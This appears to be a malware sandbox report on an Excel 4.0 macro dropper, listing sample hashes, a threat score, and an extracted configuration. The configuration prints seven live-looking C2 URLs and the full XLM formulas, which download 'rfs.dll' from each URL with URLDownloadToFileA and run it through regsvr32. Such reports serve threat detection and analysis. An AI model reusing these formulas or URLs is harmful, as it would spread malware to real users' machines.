General

  • Target

    6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a

  • Size

    29KB

  • Sample

    240909-1zrtqsseqr

  • MD5

    cd0dcdbdfc1cf4b526986ec894b047d5

  • SHA1

    eeb5a806d9b67394a5bf71f61f6b25968fca24ae

  • SHA256

    6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a

  • SHA512

    9f64916b236800db0888acc33f6a92022a584b4049f0409b53717f81c8701515c0c87cabbfdabeab68b4d71d813b43cfa8c870d749e66246abdd375c06217024

  • SSDEEP

    384:2ClT2l8Un7pfmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqzGFzHZnRCMfUVhnI6k8PS:2ClnUn7FmD4ys2ewg4F32B3HpoxxJja

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.casache.com/web/gTj3TrZ/

https://www.aulavirtualapecc.com/server/oib/

http://30aweddingco.com/cgi-bin/QUx/

http://blacksmithbooks.com/blog/OkmsfYUA/

http://consultores-sic.com/fw/AOOfOtj1qqgLWR/

http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/

https://damjangro.org/data/XPMJ/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.casache.com/web/gTj3TrZ/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.aulavirtualapecc.com/server/oib/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://30aweddingco.com/cgi-bin/QUx/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blacksmithbooks.com/blog/OkmsfYUA/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consultores-sic.com/fw/AOOfOtj1qqgLWR/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/XPMJ/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Targets

    • Target

      6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a

    • Size

      29KB

    • MD5

      cd0dcdbdfc1cf4b526986ec894b047d5

    • SHA1

      eeb5a806d9b67394a5bf71f61f6b25968fca24ae

    • SHA256

      6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a

    • SHA512

      9f64916b236800db0888acc33f6a92022a584b4049f0409b53717f81c8701515c0c87cabbfdabeab68b4d71d813b43cfa8c870d749e66246abdd375c06217024

    • SSDEEP

      384:2ClT2l8Un7pfmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqzGFzHZnRCMfUVhnI6k8PS:2ClnUn7FmD4ys2ewg4F32B3HpoxxJja

    Score
    3/10

MITRE ATT&CK Enterprise v15

Tasks